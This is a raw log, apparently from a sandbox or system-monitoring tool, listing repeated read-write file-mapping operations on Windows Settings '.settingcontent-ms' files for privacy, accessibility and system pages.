Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemShellMode.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemShellMode.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCalendar.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCalendar.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyContacts.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyContacts.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyEmail.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyEmail.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyGeneral.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyGeneral.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyLocation.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyLocation.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMessaging.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMessaging.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMicrophone.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMicrophone.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMotionData.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyMotionData.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyPersonalization.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyPersonalization.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyRadios.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyRadios.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyWebcam.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyWebcam.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreMusUpdate.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreMusUpdate.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreOneBackup.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreOneBackup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreRestore.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageRestoreRestore.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageSpeech.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageSpeech.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStart.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStart.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageThemes.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageThemes.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionDateTime.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionDateTime.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionLanguage.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionLanguage.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionSpelling.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageTimeRegionSpelling.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageWindowsDefender.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageWindowsDefender.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Settings_DeveloperModeGroup.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Settings_DeveloperModeGroup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2192 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2176 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2160 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2144 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2144 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2160 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2160 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2144 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
